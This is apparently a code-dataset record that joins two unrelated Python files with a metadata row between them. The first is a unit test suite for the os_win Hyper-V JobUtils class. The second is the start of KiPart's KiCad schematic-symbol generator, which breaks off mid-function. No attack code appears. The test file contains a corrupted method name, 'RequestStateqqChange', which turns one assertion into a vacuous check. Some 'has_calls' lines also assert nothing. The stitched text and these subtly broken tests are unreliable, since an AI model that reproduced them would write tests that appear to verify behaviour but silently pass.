# Copyright 2015 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from unittest import mock import ddt from os_win import constants from os_win import exceptions from os_win.tests.unit import test_base from os_win.utils import jobutils @ddt.ddt class JobUtilsTestCase(test_base.OsWinBaseTestCase): """Unit tests for the Hyper-V JobUtils class.""" _FAKE_RET_VAL = 0 _FAKE_JOB_STATUS_BAD = -1 _FAKE_JOB_DESCRIPTION = "fake_job_description" _FAKE_JOB_PATH = 'fake_job_path' _FAKE_ERROR = "fake_error" _FAKE_ELAPSED_TIME = 0 def setUp(self): super(JobUtilsTestCase, self).setUp() self.jobutils = jobutils.JobUtils() self.jobutils._conn_attr = mock.MagicMock() @mock.patch.object(jobutils.JobUtils, '_wait_for_job') def test_check_ret_val_started(self, mock_wait_for_job): self.jobutils.check_ret_val(constants.WMI_JOB_STATUS_STARTED, mock.sentinel.job_path) mock_wait_for_job.assert_called_once_with(mock.sentinel.job_path) @mock.patch.object(jobutils.JobUtils, '_wait_for_job') def test_check_ret_val_ok(self, mock_wait_for_job): self.jobutils.check_ret_val(self._FAKE_RET_VAL, mock.sentinel.job_path) self.assertFalse(mock_wait_for_job.called) def test_check_ret_val_exception(self): self.assertRaises(exceptions.WMIJobFailed, self.jobutils.check_ret_val, mock.sentinel.ret_val_bad, mock.sentinel.job_path) def test_wait_for_job_ok(self): mock_job = self._prepare_wait_for_job( constants.JOB_STATE_COMPLETED_WITH_WARNINGS) job = self.jobutils._wait_for_job(self._FAKE_JOB_PATH) self.assertEqual(mock_job, job) def test_wait_for_job_error_state(self): self._prepare_wait_for_job( constants.JOB_STATE_TERMINATED) self.assertRaises(exceptions.WMIJobFailed, self.jobutils._wait_for_job, self._FAKE_JOB_PATH) def test_wait_for_job_error_code(self): self._prepare_wait_for_job( constants.JOB_STATE_COMPLETED_WITH_WARNINGS, error_code=1) self.assertRaises(exceptions.WMIJobFailed, self.jobutils._wait_for_job, self._FAKE_JOB_PATH) @ddt.data({"extended": False, "expected_fields": ["InstanceID"]}, {"extended": True, "expected_fields": ["InstanceID", "DetailedStatus"]}) @ddt.unpack @mock.patch.object(jobutils.JobUtils, '_get_job_error_details') def test_get_job_details(self, mock_get_job_err, expected_fields, extended): mock_job = mock.Mock() details = self.jobutils._get_job_details(mock_job, extended=extended) if extended: mock_get_job_err.assert_called_once_with(mock_job) self.assertEqual(details['RawErrors'], mock_get_job_err.return_value) for field in expected_fields: self.assertEqual(getattr(mock_job, field), details[field]) def test_get_job_error_details(self): mock_job = mock.Mock() error_details = self.jobutils._get_job_error_details(mock_job) mock_job.GetErrorEx.assert_called_once_with() self.assertEqual(mock_job.GetErrorEx.return_value, error_details) def test_get_job_error_details_exception(self): mock_job = mock.Mock() mock_job.GetErrorEx.side_effect = Exception self.assertIsNone(self.jobutils._get_job_error_details(mock_job)) def test_get_pending_jobs(self): mock_killed_job = mock.Mock(JobState=constants.JOB_STATE_KILLED) mock_running_job = mock.Mock(JobState=constants.WMI_JOB_STATE_RUNNING) mock_error_st_job = mock.Mock(JobState=constants.JOB_STATE_EXCEPTION) mappings = [mock.Mock(AffectingElement=None), mock.Mock(AffectingElement=mock_killed_job), mock.Mock(AffectingElement=mock_running_job), mock.Mock(AffectingElement=mock_error_st_job)] self.jobutils._conn.Msvm_AffectedJobElement.return_value = mappings mock_affected_element = mock.Mock() expected_pending_jobs = [mock_running_job] pending_jobs = self.jobutils._get_pending_jobs_affecting_element( mock_affected_element) self.assertEqual(expected_pending_jobs, pending_jobs) self.jobutils._conn.Msvm_AffectedJobElement.assert_called_once_with( AffectedElement=mock_affected_element.path_.return_value) @mock.patch.object(jobutils._utils, '_is_not_found_exc') def test_get_pending_jobs_ignored(self, mock_is_not_found_exc): mock_not_found_mapping = mock.MagicMock() type(mock_not_found_mapping).AffectingElement = mock.PropertyMock( side_effect=exceptions.x_wmi) self.jobutils._conn.Msvm_AffectedJobElement.return_value = [ mock_not_found_mapping] pending_jobs = self.jobutils._get_pending_jobs_affecting_element( mock.MagicMock()) self.assertEqual([], pending_jobs) @mock.patch.object(jobutils._utils, '_is_not_found_exc') def test_get_pending_jobs_reraised(self, mock_is_not_found_exc): mock_is_not_found_exc.return_value = False mock_not_found_mapping = mock.MagicMock() type(mock_not_found_mapping).AffectingElement = mock.PropertyMock( side_effect=exceptions.x_wmi) self.jobutils._conn.Msvm_AffectedJobElement.return_value = [ mock_not_found_mapping] self.assertRaises(exceptions.x_wmi, self.jobutils._get_pending_jobs_affecting_element, mock.MagicMock()) @ddt.data(True, False) @mock.patch.object(jobutils.JobUtils, '_get_pending_jobs_affecting_element') def test_stop_jobs_helper(self, jobs_ended, mock_get_pending_jobs): mock_job1 = mock.Mock(Cancellable=True) mock_job2 = mock.Mock(Cancellable=True) mock_job3 = mock.Mock(Cancellable=False) pending_jobs = [mock_job1, mock_job2, mock_job3] mock_get_pending_jobs.side_effect = ( pending_jobs, pending_jobs if not jobs_ended else []) mock_job1.RequestStateChange.side_effect = ( test_base.FakeWMIExc(hresult=jobutils._utils._WBEM_E_NOT_FOUND)) mock_job2.RequestStateChange.side_effect = ( test_base.FakeWMIExc(hresult=mock.sentinel.hresult)) if jobs_ended: self.jobutils._stop_jobs(mock.sentinel.vm) else: self.assertRaises(exceptions.JobTerminateFailed, self.jobutils._stop_jobs, mock.sentinel.vm) mock_get_pending_jobs.assert_has_calls( [mock.call(mock.sentinel.vm)] * 2) mock_job1.RequestStateChange.assert_called_once_with( self.jobutils._KILL_JOB_STATE_CHANGE_REQUEST) mock_job2.RequestStateChange.assert_called_once_with( self.jobutils._KILL_JOB_STATE_CHANGE_REQUEST) self.assertFalse(mock_job3.RequestStateqqChange.called) @mock.patch.object(jobutils.JobUtils, '_stop_jobs') def test_stop_jobs(self, mock_stop_jobs_helper): fake_timeout = 1 self.jobutils.stop_jobs(mock.sentinel.element, fake_timeout) mock_stop_jobs_helper.assert_called_once_with(mock.sentinel.element) def test_is_job_completed_true(self): job = mock.MagicMock(JobState=constants.WMI_JOB_STATE_COMPLETED) self.assertTrue(self.jobutils._is_job_completed(job)) def test_is_job_completed_false(self): job = mock.MagicMock(JobState=constants.WMI_JOB_STATE_RUNNING) self.assertFalse(self.jobutils._is_job_completed(job)) def _prepare_wait_for_job(self, state=_FAKE_JOB_STATUS_BAD, error_code=0): mock_job = mock.MagicMock() mock_job.JobState = state mock_job.ErrorCode = error_code mock_job.Description = self._FAKE_JOB_DESCRIPTION mock_job.ElapsedTime = self._FAKE_ELAPSED_TIME wmi_patcher = mock.patch.object(jobutils.JobUtils, '_get_wmi_obj') mock_wmi = wmi_patcher.start() self.addCleanup(wmi_patcher.stop) mock_wmi.return_value = mock_job return mock_job def test_modify_virt_resource(self): side_effect = [ (self._FAKE_JOB_PATH, mock.MagicMock(), self._FAKE_RET_VAL)] self._check_modify_virt_resource_max_retries(side_effect=side_effect) def test_modify_virt_resource_max_retries_exception(self): side_effect = exceptions.HyperVException('expected failure.') self._check_modify_virt_resource_max_retries( side_effect=side_effect, num_calls=6, expected_fail=True) def test_modify_virt_resource_max_retries(self): side_effect = [exceptions.HyperVException('expected failure.')] * 5 + [ (self._FAKE_JOB_PATH, mock.MagicMock(), self._FAKE_RET_VAL)] self._check_modify_virt_resource_max_retries(side_effect=side_effect, num_calls=5) @mock.patch('time.sleep') def _check_modify_virt_resource_max_retries( self, mock_sleep, side_effect, num_calls=1, expected_fail=False): mock_svc = mock.MagicMock() self.jobutils._vs_man_svc_attr = mock_svc mock_svc.ModifyResourceSettings.side_effect = side_effect mock_res_setting_data = mock.MagicMock() mock_res_setting_data.GetText_.return_value = mock.sentinel.res_data if expected_fail: self.assertRaises(exceptions.HyperVException, self.jobutils.modify_virt_resource, mock_res_setting_data) else: self.jobutils.modify_virt_resource(mock_res_setting_data) mock_calls = [ mock.call(ResourceSettings=[mock.sentinel.res_data])] * num_calls mock_svc.ModifyResourceSettings.has_calls(mock_calls) mock_sleep.has_calls(mock.call(1) * num_calls) def test_add_virt_resource(self): self._test_virt_method('AddResourceSettings', 3, 'add_virt_resource', True, mock.sentinel.vm_path, [mock.sentinel.res_data]) def test_remove_virt_resource(self): self._test_virt_method('RemoveResourceSettings', 2, 'remove_virt_resource', False, ResourceSettings=[mock.sentinel.res_path]) def test_add_virt_feature(self): self._test_virt_method('AddFeatureSettings', 3, 'add_virt_feature', True, mock.sentinel.vm_path, [mock.sentinel.res_data]) def test_modify_virt_feature(self): self._test_virt_method('ModifyFeatureSettings', 3, 'modify_virt_feature', False, FeatureSettings=[mock.sentinel.res_data]) def test_remove_virt_feature(self): self._test_virt_method('RemoveFeatureSettings', 2, 'remove_virt_feature', False, FeatureSettings=[mock.sentinel.res_path]) def _test_virt_method(self, vsms_method_name, return_count, utils_method_name, with_mock_vm, *args, **kwargs): mock_svc = mock.MagicMock() self.jobutils._vs_man_svc_attr = mock_svc vsms_method = getattr(mock_svc, vsms_method_name) mock_rsd = self._mock_vsms_method(vsms_method, return_count) if with_mock_vm: mock_vm = mock.MagicMock() mock_vm.path_.return_value = mock.sentinel.vm_path getattr(self.jobutils, utils_method_name)(mock_rsd, mock_vm) else: getattr(self.jobutils, utils_method_name)(mock_rsd) if args: vsms_method.assert_called_once_with(*args) else: vsms_method.assert_called_once_with(**kwargs) def _mock_vsms_method(self, vsms_method, return_count): args = None if return_count == 3: args = ( mock.sentinel.job_path, mock.MagicMock(), self._FAKE_RET_VAL) else: args = (mock.sentinel.job_path, self._FAKE_RET_VAL) vsms_method.return_value = args mock_res_setting_data = mock.MagicMock() mock_res_setting_data.GetText_.return_value = mock.sentinel.res_data mock_res_setting_data.path_.return_value = mock.sentinel.res_path self.jobutils.check_ret_val = mock.MagicMock() return mock_res_setting_data @mock.patch.object(jobutils.JobUtils, 'check_ret_val') def test_remove_multiple_virt_resources_not_found(self, mock_check_ret): excepinfo = [None] * 5 + [jobutils._utils._WBEM_E_NOT_FOUND] mock_check_ret.side_effect = exceptions.x_wmi( 'expected error', com_error=mock.Mock(excepinfo=excepinfo)) vsms_method = self.jobutils._vs_man_svc.RemoveResourceSettings vsms_method.return_value = (mock.sentinel.job, mock.sentinel.ret_val) mock_virt_res = mock.Mock() self.assertRaises(exceptions.NotFound, self.jobutils.remove_virt_resource, mock_virt_res) vsms_method.assert_called_once_with( ResourceSettings=[mock_virt_res.path_.return_value]) mock_check_ret.assert_called_once_with(mock.sentinel.ret_val, mock.sentinel.job)
apache-2.0
-1,470,856,766,625,067,300
42.024024
79
0.619879
false
3.602464
true
false
false
xesscorp/KiPart
kipart/kipart.py
1
39760
# -*- coding: utf-8 -*- # MIT license # # Copyright (C) 2015-2019 by XESS Corp. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. from __future__ import absolute_import, division, print_function import argparse as ap import importlib import io import math import os import re import sys import zipfile from builtins import str from collections import OrderedDict from copy import copy from pprint import pprint from affine import Affine from past.utils import old_div from .common import * from .pckg_info import __version__ from .py_2_3 import * __all__ = ["kipart"] # Only export this routine for use by the outside world. THIS_MODULE = sys.modules[__name__] # Ref to this module for making named calls. # Settings for creating the KiCad schematic part symbol. # Dimensions are given in mils (0.001"). # Origin point. XO = 0 YO = 0 # Pin settings. PIN_LENGTH = 200 PIN_SPACING = 100 PIN_NUM_SIZE = 50 # Font size for pin numbers. PIN_NAME_SIZE = 50 # Font size for pin names. PIN_NAME_OFFSET = 40 # Separation between pin and pin name. PIN_ORIENTATION = "left" PIN_STYLE = "line" SHOW_PIN_NUMBER = True # Show pin numbers when True. SHOW_PIN_NAME = True # Show pin names when True. SINGLE_PIN_SUFFIX = "" MULTI_PIN_SUFFIX = "*" PIN_SPACER_PREFIX = "*" # Settings for box drawn around pins in a unit. DEFAULT_BOX_LINE_WIDTH = 0 # Mapping from understandable schematic symbol box fill-type name # to the fill-type indicator used in the KiCad part library. BOX_FILLS = {"no_fill": "N", "fg_fill": "F", "bg_fill": "f"} DEFAULT_BOX_FILL = "bg_fill" # Part reference. REF_SIZE = 60 # Font size. REF_Y_OFFSET = 250 # Part number. PART_NUM_SIZE = 60 # Font size. PART_NUM_Y_OFFSET = 150 # Part footprint PART_FOOTPRINT_SIZE = 60 # Font size. PART_FOOTPRINT_Y_OFFSET = 50 # Part manufacturer number. PART_MPN_SIZE = 60 # Font size. PART_MPN_Y_OFFSET = -50 # Part datasheet. PART_DATASHEET_SIZE = 60 # Font size. PART_DATASHEET_Y_OFFSET = -150 # Part description. PART_DESC_SIZE = 60 # Font size. PART_DESC_Y_OFFSET = -250 # Mapping from understandable pin orientation name to the orientation # indicator used in the KiCad part library. This mapping looks backward, # but if pins are placed on the left side of the symbol, you actually # want to use the pin symbol where the line points to the right. # The same goes for the other sides. PIN_ORIENTATIONS = { "": "R", "left": "R", "right": "L", "bottom": "U", "down": "U", "top": "D", "up": "D", } scrubber = re.compile("[^\w~#]+") PIN_ORIENTATIONS = { scrubber.sub("", k).lower(): v for k, v in list(PIN_ORIENTATIONS.items()) } ROTATION = {"left": 0, "right": 180, "bottom": 90, "top": -90} # Mapping from understandable pin type name to the type # indicator used in the KiCad part library. PIN_TYPES = { "input": "I", "inp": "I", "in": "I", "clk": "I", "output": "O", "outp": "O", "out": "O", "bidirectional": "B", "bidir": "B", "bi": "B", "inout": "B", "io": "B", "iop": "B", "tristate": "T", "tri": "T", "passive": "P", "pass": "P", "unspecified": "U", "un": "U", "": "U", "analog": "U", "power_in": "W", "pwr_in": "W", "pwrin": "W", "power": "W", "pwr": "W", "ground": "W", "gnd": "W", "power_out": "w", "pwr_out": "w", "pwrout": "w", "pwr_o": "w", "open_collector": "C", "opencollector": "C", "open_coll": "C", "opencoll": "C", "oc": "C", "open_emitter": "E", "openemitter": "E", "open_emit": "E", "openemit": "E", "oe": "E", "no_connect": "N", "noconnect": "N", "no_conn": "N", "noconn": "N", "nc": "N", } PIN_TYPES = {scrubber.sub("", k).lower(): v for k, v in list(PIN_TYPES.items())} # Mapping from understandable pin drawing style to the style # indicator used in the KiCad part library. PIN_STYLES = { "line": "", "": "", "inverted": "I", "inv": "I", "~": "I", "#": "I", "clock": "C", "clk": "C", "rising_clk": "C", "inverted_clock": "IC", "inv_clk": "IC", "clk_b": "IC", "clk_n": "IC", "~clk": "IC", "#clk": "IC", "input_low": "L", "inp_low": "L", "in_lw": "L", "in_b": "L", "in_n": "L", "~in": "L", "#in": "L", "clock_low": "CL", "clk_low": "CL", "clk_lw": "CL", "output_low": "V", "outp_low": "V", "out_lw": "V", "out_b": "V", "out_n": "V", "~out": "V", "#out": "V", "falling_edge_clock": "F", "falling_clk": "F", "fall_clk": "F", "non_logic": "X", "nl": "X", "analog": "X", } PIN_STYLES = {scrubber.sub("", k).lower(): v for k, v in list(PIN_STYLES.items())} # Format strings for various items in a KiCad part library. LIB_HEADER = "EESchema-LIBRARY Version 2.3\n" START_DEF = "DEF {name} {ref} 0 {pin_name_offset} {show_pin_number} {show_pin_name} {num_units} L N\n" END_DEF = "ENDDEF\n" REF_FIELD = 'F0 "{ref_prefix}" {x} {y} {font_size} H V {text_justification} CNN\n' PARTNUM_FIELD = 'F1 "{num}" {x} {y} {font_size} H V {text_justification} CNN\n' FOOTPRINT_FIELD = 'F2 "{footprint}" {x} {y} {font_size} H I {text_justification} CNN\n' DATASHEET_FIELD = 'F3 "{datasheet}" {x} {y} {font_size} H I {text_justification} CNN\n' MPN_FIELD = 'F4 "{manf_num}" {x} {y} {font_size} H I {text_justification} CNN "manf#"\n' DESC_FIELD = 'F5 "{desc}" {x} {y} {font_size} H I {text_justification} CNN "desc"\n' START_DRAW = "DRAW\n" END_DRAW = "ENDDRAW\n" BOX = "S {x0} {y0} {x1} {y1} {unit_num} 1 {line_width} {fill}\n" PIN = "X {name} {num} {x} {y} {length} {orientation} {num_sz} {name_sz} {unit_num} 1 {pin_type} {pin_style}\n" def annotate_pins(unit_pins): """Annotate pin names to indicate special information.""" for name, pins in unit_pins: # If there are multiple pins with the same name in a unit, then append a # distinctive suffix to the pin name to indicate multiple pins are placed # at a single location on the unit. (This is done so multiple pins that # should be on the same net (e.g. GND) can be connected using a single # net connection in the schematic.) name_suffix = SINGLE_PIN_SUFFIX if len(pins) > 1: # name_suffix = MULTI_PIN_SUFFIX name_suffix = "[{}]".format(len(pins)) for pin in pins: pin.name += name_suffix def get_pin_num_and_spacer(pin): pin_num = str(pin.num) pin_spacer = 0 # spacer pins have pin numbers starting with a special prefix char. if pin_num.startswith(PIN_SPACER_PREFIX): pin_spacer = 1 pin_num = pin_num[1:] # Remove the spacer prefix. return pin_num, pin_spacer def count_pin_slots(unit_pins): """Count the number of vertical pin slots needed for a column of pins.""" # Compute the # of slots for the column of pins, taking spacers into account. num_slots = 0 pin_num_len = 0 for name, pins in unit_pins: pin_spacer = 0 pin_num_len = 0 for pin in pins: pin_num, pin_spacer = get_pin_num_and_spacer(pin) pin_num_len = max(pin_num_len, len(pin_num)) num_slots += pin_spacer # Add a slot if there was a spacer. # Add a slot if the pin number was more than just a spacer prefix. if pin_num_len > 0: num_slots += 1 return num_slots def pins_bbox(unit_pins): """Return the bounding box of a column of pins and their names.""" if len(unit_pins) == 0: return [[XO, YO], [XO, YO]] # No pins, so no bounding box. width = 0 for name, pins in unit_pins: # Update the maximum observed width of a pin name. This is used later to # size the width of the box surrounding the pin names for this unit. width = max(width, len(pins[0].name) * PIN_NAME_SIZE) # Add the separation space before and after the pin name. width += PIN_LENGTH + 2 * PIN_NAME_OFFSET # Make bounding box an integer number of pin spaces so pin connections are always on the grid. width = math.ceil(old_div(float(width), PIN_SPACING)) * PIN_SPACING # Compute the height of the column of pins. height = count_pin_slots(unit_pins) * PIN_SPACING return [[XO, YO + PIN_SPACING], [XO + width, YO - height]] def balance_bboxes(bboxes): """Make the symbol more balanced by adjusting the bounding boxes of the pins on each side.""" X = 0 Y = 1 def find_bbox_bbox(*bboxes): """Find the bounding box for a set of bounding boxes.""" bb = [[0, 0], [0, 0]] for bbox in bboxes: bb[0][X] = min(bb[0][X], bbox[0][X]) bb[1][X] = max(bb[1][X], bbox[1][X]) bb[0][Y] = max(bb[0][Y], bbox[0][Y]) bb[1][Y] = min(bb[1][Y], bbox[1][Y]) return bb # Determine the number of sides of the symbol with pins. num_sides = len(bboxes) if num_sides == 4: # If the symbol has pins on all four sides, then check to see if there # are approximately the same number of pins on all four sides. If so, # then equalize the bounding box for each side. Otherwise, equalize # the left & right bounding boxes and the top & bottom bounding boxes. lr_bbox = find_bbox_bbox(bboxes["left"], bboxes["right"]) lr_hgt = abs(lr_bbox[0][Y] - lr_bbox[1][Y]) tb_bbox = find_bbox_bbox(bboxes["top"], bboxes["bottom"]) tb_hgt = abs(tb_bbox[0][Y] - tb_bbox[1][Y]) if 0.75 <= float(lr_hgt) / float(tb_hgt) <= 1 / 0.75: bal_bbox = find_bbox_bbox(*list(bboxes.values())) for side in bboxes: bboxes[side] = copy(bal_bbox) else: bboxes["left"] = copy(lr_bbox) bboxes["right"] = copy(lr_bbox) bboxes["top"] = copy(tb_bbox) bboxes["bottom"] = copy(tb_bbox) elif num_sides == 3: # If the symbol only has pins on threee sides, then equalize the # bounding boxes for the pins on opposite sides and leave the # bounding box on the other side unchanged. if "left" not in bboxes or "right" not in bboxes: # Top & bottom side pins, but the left or right side is empty. bal_bbox = find_bbox_bbox(bboxes["top"], bboxes["bottom"]) bboxes["top"] = copy(bal_bbox) bboxes["bottom"] = copy(bal_bbox) elif "top" not in bboxes or "bottom" not in bboxes: # Left & right side pins, but the top or bottom side is empty. bal_bbox = find_bbox_bbox(bboxes["left"], bboxes["right"]) bboxes["left"] = copy(bal_bbox) bboxes["right"] = copy(bal_bbox) elif num_sides == 2: # If the symbol only has pins on two opposing sides, then equalize the # height of the bounding boxes for each side. Leave the width unchanged. if "left" in bboxes and "right" in bboxes: bal_bbox = find_bbox_bbox(bboxes["left"], bboxes["right"]) bboxes["left"][0][Y] = bal_bbox[0][Y] bboxes["left"][1][Y] = bal_bbox[1][Y] bboxes["right"][0][Y] = bal_bbox[0][Y] bboxes["right"][1][Y] = bal_bbox[1][Y] elif "top" in bboxes and "bottom" in bboxes: bal_bbox = find_bbox_bbox(bboxes["top"], bboxes["bottom"]) bboxes["top"][0][Y] = bal_bbox[0][Y] bboxes["top"][1][Y] = bal_bbox[1][Y] bboxes["bottom"][0][Y] = bal_bbox[0][Y] bboxes["bottom"][1][Y] = bal_bbox[1][Y] def draw_pins(unit_num, unit_pins, bbox, transform, side, push, fuzzy_match): """Draw a column of pins rotated/translated by the transform matrix.""" # String to add pin definitions to. pin_defn = "" # Find the actual height of the column of pins and subtract it from the # bounding box (which should be at least as large). Half the difference # will be the offset needed to center the pins on the side of the symbol. Y = 1 # Index for Y coordinate. pins_bb = pins_bbox(unit_pins) height_offset = abs(bbox[0][Y] - bbox[1][Y]) - abs(pins_bb[0][Y] - pins_bb[1][Y]) push = min(max(0.0, push), 1.0) if side in ("right", "top"): push = 1.0 - push height_offset *= push height_offset -= height_offset % PIN_SPACING # Keep stuff on the PIN_SPACING grid. # Start drawing pins from the origin. x = XO y = YO - height_offset for name, pins in unit_pins: # Detect pins with "spacer" pin numbers. pin_spacer = 0 pin_num_len = 0 for pin in pins: pin_num, pin_spacer = get_pin_num_and_spacer(pin) pin_num_len = max(pin_num_len, len(pin_num)) y -= pin_spacer * PIN_SPACING # Add space between pins if there was a spacer. if pin_num_len == 0: continue # Omit pin if it only had a spacer prefix and no actual pin number. # Rotate/translate the current drawing point. (draw_x, draw_y) = transform * (x, y) # Use approximate matching to determine the pin's type, style and orientation. pin_type = find_closest_match(pins[0].type, PIN_TYPES, fuzzy_match) pin_style = find_closest_match(pins[0].style, PIN_STYLES, fuzzy_match) pin_side = find_closest_match(pins[0].side, PIN_ORIENTATIONS, fuzzy_match) if pins[0].hidden.lower().strip() in ["y", "yes", "t", "true", "1"]: pin_style = "N" + pin_style # Create all the pins with a particular name. If there are more than one, # they are laid on top of each other and only the first is visible. num_size = PIN_NUM_SIZE # First pin will be visible. for pin in pins: pin_num = str(pin.num) # Remove any spacer prefix on the pin numbers. if pin_num.startswith(PIN_SPACER_PREFIX): pin_num = pin_num[1:] # Create a pin using the pin data. pin_defn += PIN.format( name=pin.name, num=pin_num, x=int(draw_x), y=int(draw_y), length=PIN_LENGTH, orientation=pin_side, num_sz=num_size, name_sz=PIN_NAME_SIZE, unit_num=unit_num, pin_type=pin_type, pin_style=pin_style, ) # Turn off visibility after the first pin. num_size = 0 # Move to the next pin placement location on this unit. y -= PIN_SPACING return pin_defn # Return part symbol definition with pins added. def zero_pad_nums(s): # Pad all numbers in the string with leading 0's. # Thus, 'A10' and 'A2' will become 'A00010' and 'A00002' and A2 will # appear before A10 in a list. try: return re.sub( r"\d+", lambda mtch: "0" * (8 - len(mtch.group(0))) + mtch.group(0), s ) except TypeError: return s # The input is probably not a string, so just return it unchanged. def num_key(pin): """Generate a key from a pin's number so they are sorted by position on the package.""" # Pad all numeric strings in the pin name with leading 0's. # Thus, 'A10' and 'A2' will become 'A00010' and 'A00002' and A2 will # appear before A10 in a list. return zero_pad_nums(pin[1][0].num) def name_key(pin): """Generate a key from a pin's name so they are sorted more logically.""" # Pad all numeric strings in the pin name with leading 0's. # Thus, 'adc10' and 'adc2' will become 'adc00010' and 'adc00002' and adc2 will # appear before adc10 in a list. return zero_pad_nums(pin[1][0].name) def row_key(pin): """Generate a key from the order the pins were entered into the CSV file.""" return pin[1][0].index def draw_symbol( part_num, part_ref_prefix, part_footprint, part_manf_num, part_datasheet, part_desc, pin_data, sort_type, reverse, fuzzy_match, fill, box_line_width, push, ): """Add a symbol for a part to the library.""" # Start the part definition with the header. part_defn = START_DEF.format( name=part_num, ref=part_ref_prefix, pin_name_offset=PIN_NAME_OFFSET, show_pin_number=SHOW_PIN_NUMBER and "Y" or "N", show_pin_name=SHOW_PIN_NAME and "Y" or "N", num_units=len(pin_data), ) # Determine if there are pins across the top of the symbol. # If so, right-justify the reference, part number, etc. so they don't # run into the top pins. If not, stick with left-justification. text_justification = "L" horiz_offset = PIN_LENGTH for unit in list(pin_data.values()): if "top" in list(unit.keys()): text_justification = "R" horiz_offset = PIN_LENGTH - 50 break # Create the field that stores the part reference. if not part_ref_prefix: part_ref_prefix = "U" part_defn += REF_FIELD.format( ref_prefix=part_ref_prefix, x=XO + horiz_offset, y=YO + REF_Y_OFFSET, text_justification=text_justification, font_size=REF_SIZE, ) # Create the field that stores the part number. if not part_num: part_num = "" part_defn += PARTNUM_FIELD.format( num=part_num, x=XO + horiz_offset, y=YO + PART_NUM_Y_OFFSET, text_justification=text_justification, font_size=PART_NUM_SIZE, ) # Create the field that stores the part footprint. if not part_footprint: part_footprint = "" part_defn += FOOTPRINT_FIELD.format( footprint=part_footprint, x=XO + horiz_offset, y=YO + PART_FOOTPRINT_Y_OFFSET, text_justification=text_justification, font_size=PART_FOOTPRINT_SIZE, ) # Create the field that stores the datasheet link. if not part_datasheet: part_datasheet = "" part_defn += DATASHEET_FIELD.format( datasheet=part_datasheet, x=XO + horiz_offset, y=YO + PART_DATASHEET_Y_OFFSET, text_justification=text_justification, font_size=PART_DATASHEET_SIZE, ) # Create the field that stores the manufacturer part number. if part_manf_num: part_defn += MPN_FIELD.format( manf_num=part_manf_num, x=XO + horiz_offset, y=YO + PART_MPN_Y_OFFSET, text_justification=text_justification, font_size=PART_MPN_SIZE, ) # Create the field that stores the datasheet link. if part_desc: part_defn += DESC_FIELD.format( desc=part_desc, x=XO + horiz_offset, y=YO + PART_DESC_Y_OFFSET, text_justification=text_justification, font_size=PART_DESC_SIZE, ) # Start the section of the part definition that holds the part's units. part_defn += START_DRAW # Get a reference to the sort-key generation function for pins. pin_key_func = getattr(THIS_MODULE, "{}_key".format(sort_type)) # This is the sort-key generation function for unit names. unit_key_func = lambda x: zero_pad_nums(x[0]) # Now create the units that make up the part. Unit numbers go from 1 # up to the number of units in the part. The units are sorted by their # names before assigning unit numbers. for unit_num, unit in enumerate( [p[1] for p in sorted(pin_data.items(), key=unit_key_func)], 1 ): # The indices of the X and Y coordinates in a list of point coords. X = 0 Y = 1 # Initialize data structures that store info for each side of a schematic symbol unit. all_sides = ["left", "right", "top", "bottom"] bbox = {side: [(XO, YO), (XO, YO)] for side in all_sides} box_pt = {side: [XO + PIN_LENGTH, YO + PIN_SPACING] for side in all_sides} anchor_pt = {side: [XO + PIN_LENGTH, YO + PIN_SPACING] for side in all_sides} transform = {} # Annotate the pins for each side of the symbol. for side_pins in list(unit.values()): annotate_pins(list(side_pins.items())) # Determine the actual bounding box for each side. bbox = {} for side, side_pins in list(unit.items()): bbox[side] = pins_bbox(list(side_pins.items())) # Adjust the sizes of the bboxes to make the unit look more symmetrical. balance_bboxes(bbox) # Determine some important points for each side of pins. for side in unit: # # C B-------A # | | # ------| name1 | # | | # ------| name2 | # # A = anchor point = upper-right corner of bounding box. # B = box point = upper-left corner of bounding box + pin length. # C = upper-left corner of bounding box. anchor_pt[side] = [ max(bbox[side][0][X], bbox[side][1][X]), max(bbox[side][0][Y], bbox[side][1][Y]), ] box_pt[side] = [ min(bbox[side][0][X], bbox[side][1][X]) + PIN_LENGTH, max(bbox[side][0][Y], bbox[side][1][Y]), ] # AL = left-side anchor point. # AB = bottom-side anchor point. # AR = right-side anchor point. # AT = top-side anchor-point. # +-------------+ # | | # | TOP | # | | # +------AL------------AT # | | # | | +---------+ # | | | | # | L | | | # | E | | R | # | F | | I | # | T | | G | # | | | H | # | | | T | # | | | | # +------AB-------+ AR--------+ # | BOTTOM | # +--------+ # # Create zero-sized bounding boxes for any sides of the unit without pins. # This makes it simpler to do the width/height calculation that follows. for side in all_sides: if side not in bbox: bbox[side] = [(XO, YO), (XO, YO)] # This is the width and height of the box in the middle of the pins on each side. box_width = max( abs(bbox["top"][0][Y] - bbox["top"][1][Y]), abs(bbox["bottom"][0][Y] - bbox["bottom"][1][Y]), ) box_height = max( abs(bbox["left"][0][Y] - bbox["left"][1][Y]), abs(bbox["right"][0][Y] - bbox["right"][1][Y]), ) for side in all_sides: # Each side of pins starts off with the orientation of a left-hand side of pins. # Transformation matrix starts by rotating the side of pins. transform[side] = Affine.rotation(ROTATION[side]) # Now rotate the anchor point to see where it goes. rot_anchor_pt = transform[side] * anchor_pt[side] # Translate the rotated anchor point to coincide with the AL anchor point. translate_x = anchor_pt["left"][X] - rot_anchor_pt[X] translate_y = anchor_pt["left"][Y] - rot_anchor_pt[Y] # Make additional translation to bring the AL point to the correct position. if side == "right": 